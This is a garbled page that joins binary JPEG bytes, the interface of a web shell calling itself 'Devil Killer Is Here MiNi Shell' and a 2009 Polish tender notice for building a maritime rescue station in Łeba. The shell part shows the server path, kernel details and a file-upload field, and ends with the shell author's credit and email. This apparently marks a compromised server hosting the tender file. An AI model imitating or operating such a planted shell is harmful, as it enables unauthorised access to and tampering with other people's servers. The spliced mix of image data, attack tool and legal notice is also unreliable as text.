JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/115287-N-2009.html

<p class="kh_header"><b>Gdynia: Budowa Morskiej Stacji Ratowniczej w Łebie</b><br>
<b>Numer ogłoszenia: 115287 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Morska Służba Poszukiwania i Ratownictwa , ul. Hryniewickiego 10, 81-340 Gdynia, woj. pomorskie, tel. 058 6615222, 6607661, faks 058 620-53-38, 6607661.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sar.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Morskiej Stacji Ratowniczej w Łebie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie budynku Morskiej Stacji Ratowniczej w Łebie z zapleczem socjalnym, infrastrukturą oraz rozbiórka istniejącej Brzegowej Stacji Ratowniczej i budynku zaplecza socjalnego na terenie działki nr 53 i nr 365/43 obręb 2 Łeba (WI.IV/MS/7111/3/BM/08) o zatwierdzeniu projektu budowlanego i pozwoleniu na budowę.
Przedmiot zamówienia obejmuje:
1. budowę budynku dwubryłowego składającego się z części socjalno-biurowej i zaplecza garażowo-magazynowego o 11/2 kondygnacji, niepodpiwniczonego, parterowego z poddaszem użytkowym, pod dachem wielospadowym krytym dachówką ceramiczną oraz budowę masztu łączności radiowej. 
Parametry techniczne i zestawienie powierzchni budynku:
kubatura: 2610,04 m3 
powierzchnia całkowita netto: 548,43 m2 w tym:
- powierzchnia parteru: 288,44 m2 , 
- powierzchnia poddasza: 259,99 m2. 
powierzchnia zabudowy: 352,34 m2,
wysokość budynku: 11,5 m2,
długość budynku: 26,59 m2; 
2. wykonanie następujących przyłączy: przyłącze zasilania w energię elektryczną, przyłącze zaopatrzenia w wodę, przyłącze odprowadzania ścieków do kanalizacji sanitarnej. Ścieki deszczowe z dachu odprowadzane będą do gruntu, poprzez skrzynki rozsączające; 
3. wbudowanie na parterze budynku kotłowni opalanej olejem opałowym lekkim na  
potrzeby c.o. i c.t. dla zapotrzebowania ciepła Q= 33 kW wraz z podgrzewaczem   pojemnościowym c.w.u. o pojemności 160 l oraz automatyką sterującą pracą kotłowni;
4. oświetlenie zewnętrzne obejmuje obwód oświetlenia zewnętrznego sterowany czujnikiem zmierzchowym z oprawami sodowymi zamontowanymi na trzech słupach oświetleniowych;
5. wykonanie odprowadzania wód deszczowych z dróg i parkingów do skrzynek   
rozsączających poprzez osadnik i separator koalescencyjny produktów ropopochodnych;
6. budowę drogi manewrowej wraz z placem manewrowym do rozładunku łodzi o nawierzchni betonowej i o powierzchni ogółem  461,50 m2, dojść pieszych z kostki wibroprasowanej o grubości 8 cm i o powierzchni 116,49 m2  oraz parkingu dla samochodów osobowych o powierzchni 148,99 m2 z jednym wpustem deszczowym;
7. pokrycie zielenią ozdobną i izolacyjną w formie trawników i krzewów terenów wolnych od zabudowy oraz dróg i placów;
8. dostawę i montaż stalowego, ocynkowanego ogrodzenia o długości 149 m  (w tym partii stalowych o długości 131,76 m i partii murowanych z cegły klinkerowej o długości 10 m) i wysokości 1,5 m w tym bramy o szerokości 4,64 m oraz dwóch furtek o szerokości 1,3 m;
9. rozbiórkę parterowego, niepodpiwniczonego budynku istniejącej Brzegowej Stacji Ratowniczej o powierzchni zabudowy 105,61 m2 i powierzchni użytkowej 86,72 m2, długości 11,54 m, szerokości 9,63 m i wysokości 4,12 m (budynek nr 3 na działce nr 53);
10. rozbiórkę jednopiętrowego, niepodpiwniczonego budynku socjalnego o powierzchni zabudowy 83,39 m2 i powierzchni użytkowej 151,28 m2 , długości 13,20 m, szerokości 9,20 m i wysokości 6,75 m (budynek nr 4 na działce nr 53);
11. likwidację istniejącego uzbrojenia podziemnego w tym między innymi demontaż i  utylizację istniejącego stalowego podziemnego zbiornika przeznaczonego na szambo o wymiarach Dn= 250 cm, L= 12 m;
12. rozebranie i wywiezienie istniejącego ogrodzenia;
13. rozebranie i wywiezienie nawierzchni istniejących placów manewrowych o nawierzchni betonowej monolitycznej o powierzchni 443 m 2;
14. rozebranie i wywiezienie nawierzchni chodnika z kostki brukowej o powierzchni 45 m 2;
15. rozebranie i wywiezienie krawężników betonowych 15 x 30 cm o długości około 126 m oraz krawężników 8 x 30 cm o długości około 45 m;
16. wycinkę i wywiezienie owocowego drzewa orzecha włoskiego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 12.700,00 (słownie: dwanaście tysięcy siedemset) złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A.) - O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1)	spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp;
2)	w okresie ostatnich 5 lat przed dniem wszczęcia Postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykażą się doświadczeniem należytego wykonania niżej wymienionychrobót budowlanych polegających na:
a)	wybudowaniu nie mniej niż jednego budynku o powierzchni całkowitej nie mniejszej niż 500 m 2 i kubaturze nie mniejszej niż 2600 m 3 ,
b)	wybudowaniu dróg wewnętrznych, parkingów i chodników o łącznej powierzchni nie mniejszej niż 700 m 2 ;
3)	dysponują osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, w zakresie pozwalającym na realizację przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osoby posiadającej wyżej określone uprawnienia;
4)	posiadają środki finansowe lub zdolność kredytową zapewniającą wykonanie zamówienia w wysokości nie mniejszej niż 500.000,00 zł .
B.) - W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
warunek nie podlegania wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp musi spełniać każdy z Wykonawców składających wspólną ofertę ( członków konsorcjum). Natomiast pozostałe warunki wymienione w punkcie A) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą spełniać łącznie. 
C.) - Zamawiający dokona oceny spełnienia warunków udziału w Postępowaniu na 
podstawie informacji zawartych w dokumentach i oświadczeniach wymienionych w Sekcji III.2 w punktach od D.) do H.), na zasadzie kwalifikacji  spełnia nie spełnia. Z treści dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia warunki udziału w Postępowaniu określone przez Zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu 
określonych w art. 22 ust.1 ustawy Pzp. Oświadczenie należy złożyć w formie oryginału. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( tzn. Wykonawców składających wspólną ofertę - konsorcjum), oświadczenie to winno być złożone w następującej formie:
1)	oświadczenie o spełnianiu warunków udziału określonych w zakresie art. 22 ust. 1 pkt. 1-3 ustawy Pzp składają (podpisują) wszyscy Wykonawcy składający wspólną ofertę (członkowie konsorcjum) lub podpisuje ustanowiony pełnomocnik w imieniu całego konsorcjum;
2)	oświadczenie w zakresie art. 22 ust. 1 pkt. 4 ustawy Pzp, składa (podpisuje) we własnym imieniu każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (członków konsorcjum).

    E.) - W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, do oferty należy dołączyć: 
a)	aktualny na dzień składania ofert odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d)	dokumenty wymienione w punktach od a) do c) można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) powyższe dokumenty składa każdy z Wykonawców (członków konsorcjum);
e)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wówczas składa odpowiednie dokumenty określone w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 87, poz. 605, zm: Dz. U. z 2008 r. Nr 188, poz. 1155).
Uwaga! W przypadku spółek cywilnych do oferty należy dołączyć zaświadczenie z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę jak i na każdego ze wspólników.
    F.) - W celu potwierdzenia spełnienia opisanego przez Zamawiającego w punkcie 
A.)2) a-b) warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia do oferty należy dołączyć niżej wymienione wykazy:

- Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia Postępowania o udzielenie zamówienia tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót budowlanych polegających na wybudowaniu nie mniej niż jednego budynku o powierzchni całkowitej nie mniejszej niż 500 m2 i kubaturze nie mniejszej niż 2600 m 3 . Wykaz musi zawierać nazwę i lokalizację obiektu (adres), opis wykonanych robót wraz z ich zakresem , termin rozpoczęcia i zakończenia robót, wartość brutto zrealizowanych robót, nazwę i  adres oraz telefon zamawiającego (inwestora). Do Wykazu należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.). Wykaz należy złożyć w formie oryginału a dokumenty potwierdzające, że roboty wymienione w ww. Wykazie zostały wykonane należycie można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
- Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia Postępowania o udzielenie zamówienia tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót budowlanych polegających na wybudowaniu dróg wewnętrznych, parkingów i chodników o łącznej powierzchni nie mniejszej niż 700 m2. Wykaz musi zawierać nazwę i lokalizację obiektu (adres), opis wykonanych robót wraz z ich zakresem, termin rozpoczęcia i zakończenia robót, wartość brutto zrealizowanych robót, nazwę i adres oraz telefon zamawiającego (inwestora). Do Wykazu należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.). Wykaz należy złożyć w formie oryginału a dokumenty potwierdzające, że roboty wymienione w ww. Wykazie zostały wykonane należycie można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

   G.) - W celu potwierdzenia spełnienia opisanego przez Zamawiającego w punkcie A.).3) 
warunku do oferty należy dołączyć następujące dokumenty:
a)	wykaz zawierający imię i nazwisko osoby, którą dysponuje lub będzie dysponował Wykonawca, która będzie uczestniczyć w wykonaniu zamówienia pełniąc funkcję kierownika budowy wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia, wykształcenia i uprawnień do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego w specjalności konstrukcyjno - budowlanej. Wykaz należy złożyć w formie oryginału;
b)	zaświadczenie z właściwej Izby Samorządu Zawodowego wystawione dla osoby, o której mowa w powyższym punkcie a), potwierdzające jej przynależność do Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składania ofert. Zamawiający dopuszcza, jako dokument równoważny, złożenie nieaktualnego zaświadczenia z w/w Izby oraz dowodu dokonania należnych składek, z którego wynika, że są one opłacone na dzień składania ofert. Dokumenty można złożyć w formie kopii poświadczonych za zgodność z oryginałem przez Wykonawcę.
c)	pisemne zobowiązanie innego podmiotu do udostępnienia osoby uczestniczącej w wykonaniu zamówienia- pełniącej funkcję kierownika budowy, jeżeli w Wykazie, o którym mowa w punkcie G.)a) Wykonawca wskazał osobę, którą będzie dysponował. W przypadku, gdy osoba wskazana w Wykazie, którą Wykonawca będzie dysponował prowadzi samodzielną działalność, to wówczas do oferty należy dołączyć pisemne zobowiązanie tej osoby do podjęcia się pełnienia funkcji kierownika budowy. Dokument można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

    H.) - W celu potwierdzenia spełnienia opisanego przez Zamawiającego w punkcie 
A).4) warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadanie środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 500.000,00 zł, do oferty dołączyć  należy informacje banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokument można złożyć w formie oryginału lub formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sar.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Morska Służba Poszukiwania i Ratownictwa, Zespół ds. Zamówień Publicznych,81-340 Gdynia, ul. Hryniewickiego 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 11:00, miejsce: siedziba Zamawiającego, Morska Służba Poszukiwania i Ratownictwa, 81-340 Gdynia ul. Hryniewickiego 10, Sekretariat (piętro II).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zaleca wykorzystanie formularzy, udostępnionych na stronie internetowej www.sar.gov.pl w zakładce: Zamówienia publiczne / Ogłoszenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com